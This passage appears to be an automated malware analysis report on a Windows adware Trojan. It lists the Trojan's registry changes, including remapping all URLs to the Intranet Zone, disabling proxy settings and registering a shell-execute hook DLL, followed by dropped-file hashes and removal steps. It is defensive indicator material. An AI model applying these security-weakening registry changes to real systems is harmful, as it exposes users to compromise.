[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "93 E7 BD DE 37 05 62 21 75 1D 10 ED 9E EE 5C 06"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\WindowsUpdater]
"Count" = "1"
The Trojan modifies IE settings for security zones to map all local web nodes with no dots, which do not belong to any zone, to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process regsvr32.exe:1500 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C1 90 2A D3 C3 DA 40 D1 96 CF C3 8E E2 8A E1 92"
[HKCR\CLSID\{98C066AB-D735-4339-9E52-A34875141B56}\InProcServer32]
"(Default)" = "%Documents and Settings%\%current user%\Cookies\matile.dll"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"EnableShellExecuteHooks" = "1"
[HKCR\CLSID\{98C066AB-D735-4339-9E52-A34875141B56}\InProcServer32]
"ThreadingModel" = "Apartment"
The process amisetup7604__99999_il2.exe:652 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKCR\Interface\{EA3F5C73-D1DF-4887-B726-1C7E1EBC5067}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{EA3F5C73-D1DF-4887-B726-1C7E1EBC5067}]
"(Default)" = "IBoot"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCR\telexes.compiles\CurVer]
"(Default)" = "telexes.compiles.1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}\1.0\0\win32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\amisetup7604__99999_il2.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\Version]
"(Default)" = "1.0"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"
[HKCR\Interface\{EA3F5C73-D1DF-4887-B726-1C7E1EBC5067}\TypeLib]
"(Default)" = "{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}\1.0\HELPDIR]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp"
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\amisetup7604__99999_il2.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
[HKCR\Interface\{EA3F5C73-D1DF-4887-B726-1C7E1EBC5067}\TypeLib]
"Version" = "1.0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\TypeLib]
"(Default)" = "{de2deba6-37b4-4d2f-8a78-56effa49ba84}"
[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}\1.0]
"(Default)" = "InstallerLib"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}]
"(Default)" = "Inst Class"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"tmnqck.exe" = "tmnqck"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "amisetup7604__99999_il2.exe"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"nop.exe" = "nop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\VersionIndependentProgID]
"(Default)" = "telexes.compiles"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
[HKCR\telexes.compiles.1\CLSID]
"(Default)" = "{4cf1ec1d-2055-4a46-b248-11fb57f52868}"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1468883313"
[HKCR\Interface\{EA3F5C73-D1DF-4887-B726-1C7E1EBC5067}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "19 8A 9E ED 93 07 C3 00 70 7D EF EB 1E 0F 52 F9"
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\ProgID]
"(Default)" = "telexes.compiles.1"
[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}\1.0\FLAGS]
"(Default)" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKCR\telexes.compiles]
"(Default)" = "Inst Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\amisetup7604__99999_il2.exe"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisetup7604__99999_il2\DEBUG]
"Trace Level" = ""
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
[HKCR\telexes.compiles.1]
"(Default)" = "Inst Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
The Trojan modifies IE settings for security zones to map all local web nodes with no dots, which do not belong to any zone, to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies the IE security-zone settings so that all web-nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies the IE security-zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following registry key(s):
[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}\1.0]
[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}]
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}]
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\Programmable]
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\LocalServer32]
[HKCR\Interface\{EA3F5C73-D1DF-4887-B726-1C7E1EBC5067}]
[HKCR\telexes.compiles.1]
[HKCR\telexes.compiles]
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\Version]
[HKCR\Interface\{EA3F5C73-D1DF-4887-B726-1C7E1EBC5067}\ProxyStubClsid32]
[HKCR\telexes.compiles\CurVer]
[HKCR\Interface\{EA3F5C73-D1DF-4887-B726-1C7E1EBC5067}\ProxyStubClsid]
[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}\1.0\0]
[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}\1.0\0\win32]
[HKCR\Interface\{EA3F5C73-D1DF-4887-B726-1C7E1EBC5067}\TypeLib]
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\ProgID]
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\VersionIndependentProgID]
[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}\1.0\FLAGS]
[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}\1.0\HELPDIR]
[HKCR\telexes.compiles.1\CLSID]
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\TypeLib]
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisetup7604__99999_il2\DEBUG]
"Trace Level"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
"AutoConfigURL"
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\LocalServer32]
"ServerExecutable"
The process rundll32.exe:1608 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5C C3 DC 4C 77 F6 82 71 E0 B9 1E 22 B4 58 77 BB"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{0DE18ECC-A0CB-45DD-A02C-692114FF4B9B}]
"DisplayName" = "hohosearch - Uninstall"
"UninstallString" = "rundll32.exe %Program Files%\Atidogrudck\atdagent.dll,u /k={0DE18ECC-A0CB-45DD-A02C-692114FF4B9B}"
The process tmnqck.exe:2024 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCR\Microsoft.Ptid.Host.List]
"List" = "aG9ob3NlYXJjaA=="
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\tmnqck\DEBUG]
"Trace Level" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "26 B3 46 D4 4C EF 3F 6A 85 C6 0F 5F 8B F7 DE 04"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCR\Local Settings\ms-ptid-key]
"(Default)" = "{8C4CE252-7DB2-4F8E-8E76-BAD0E5826A83}"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
[HKCR\Local Settings\ms-ptid-key]
"{8C4CE252-7DB2-4F8E-8E76-BAD0E5826A83}" = "17 2C 2F 65 07 8A 52 5F 94 93 8B 96 96 DC 61 77"
The Trojan modifies the IE security-zone settings so that all local web-nodes (hostnames without dots) that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies the IE security-zone settings so that all web-nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies the IE security-zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\tmnqck\DEBUG]
"Trace Level"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"ProxyServer"
The process chcUpdateTsk.html5:1240 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "47 06 A8 5A 99 11 B7 29 09 8C 10 84 FA 67 08 4D"
Dropped PE files
MD5 | File path |
---|---|
b80fc4706b18a05446598a2dce6c57a9 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\1.tmp.exe |
84b3683a4ecca8a183ea5e8219934a05 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\amisetup7548__10235_il2.exe |
84b3683a4ecca8a183ea5e8219934a05 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\amisetup7604__99999_il2.exe |
9baa6c3392dc9c0ad1733882a3faf2ba | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\awh6.tmp |
1fa9fe66c4c62c9fbb152972e8662e20 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\prepreinstaller_win.exe |
54359f8ab1edeba9bf9f1f54346ec7d8 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\tmnqck.exe |
1fa9fe66c4c62c9fbb152972e8662e20 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4N740QDH\prepreinstaller_win[1].exe |
b80fc4706b18a05446598a2dce6c57a9 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\YB33U3FA\Bundle[1].exe |
53107ede3553b72f6eda0778e5fc4319 | c:\Program Files\Atidogrudck\atdagent.dll |
5477005b383d549d0cf4d8fc761a27c0 | c:\Program Files\Chocosyledusy\chcUpdateSrv.html5 |
1dce88ae76d5372a1e0da7a42aaff80e | c:\Program Files\Chocosyledusy\chcUpdateTsk.html5 |
4eb83fc544baae895b2f0bf2730e13d5 | c:\Program Files\Coabuied\DeElevator.dll |
629b6671ced1f1992d0f331b0dc97862 | c:\Program Files\Coabuied\ckehack.html5 |
fdf352824c5caf92cc16abd2c2d84145 | c:\Program Files\Coabuied\matile.dll |
564799253de378dd915f98c4c16e8055 | c:\Program Files\Coabuied\wihoy.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
amisetup7548__10235_il2.exe:1004
chcUpdateTsk.exe:1096
chcUpdateSrv.html5:1700
chcUpdateSrv.html5:548
ckehack.html5:1692
ckehack.html5:468
ckehack.html5:456
ckehack.html5:2032
nop.exe:1512
1.tmp.exe:1340
1.tmp.exe:1836
1.tmp.exe:2732
ping.exe:560
ping.exe:1008
regsvr32.exe:1500
amisetup7604__99999_il2.exe:652
rundll32.exe:1608
tmnqck.exe:2024
chcUpdateTsk.html5:1240
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\amipixel.cfg (116 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\YB33U3FA\amipb[1].js (32425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amisetup7548__10235_il2.exe:typelib (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GLQUASXM\index[1].htm (2197 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amitest.txt (39 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\MR05AJUV\desktop.ini (67 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\CZW1U92J\desktop.ini (67 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\C1W14R8D\desktop.ini (67 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\YHAV8105\desktop.ini (67 bytes)
%Documents and Settings%\LocalService\Cookies\index.dat (388 bytes)
%Documents and Settings%\LocalService\Cookies\system@upxnav[1].txt (212 bytes)
%Documents and Settings%\%current user%\Cookies\matile.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\awh2.tmp (177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\awh3.tmp (105356 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\awh4.tmp (177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\awh5.tmp (105356 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\awhA.tmp (103196 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\awh9.tmp (177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\prepreinstaller_win.exe (4013 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\YB33U3FA\Bundle[1].exe (30186 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4N740QDH\prepreinstaller_win[1].exe (30122 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\MUpdater.exe.config (165 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1.tmp.exe (3416 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1OITCXMZ\MUpdater.exe[1].config (165 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\awh6.tmp (3560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4N740QDH\index[1].htm (1203 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\awh7.tmp (45428 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amisetup7604__99999_il2.exe:typelib (8 bytes)
